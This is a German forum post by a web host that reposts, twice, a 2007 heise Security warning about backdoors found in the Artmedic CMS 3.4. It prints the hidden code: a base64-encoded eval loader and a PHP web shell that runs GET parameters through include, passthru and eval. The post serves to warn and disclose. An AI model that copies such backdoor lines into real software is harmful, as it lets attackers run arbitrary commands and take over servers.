19.05.2007, 07:41:14
Im Code des Content Management Systems Artmedic sind mehrere Hintertüren versteckt, über die ein Angreifer den Server komprimitieren und komplett übernehmen kann. Darüber hinaus versendet das Setup-Skript eine E-Mail mit dem Namen des unterminierten Servers an eine Adresse in Russland.
An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form:
$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));
Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus.
if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);
Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten.
Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen.
Quelle: heise.de
[/b]
An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form:
$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));
Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus.
if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);
Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten.
Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen.
Quelle: heise.de
[/b]
Mit freundlichen Grüßen / Best Regards
Markus Clemenz
ok-webhosting
Krähwinkelweg 23
71229 Leonberg
Telefon +49 (0)7152 401 82 52
Telefax +49 (0)7152 401 82 53
Email: Kontakt@ok-webhosting.de
Markus Clemenz
ok-webhosting
Krähwinkelweg 23
71229 Leonberg
Telefon +49 (0)7152 401 82 52
Telefax +49 (0)7152 401 82 53
Email: Kontakt@ok-webhosting.de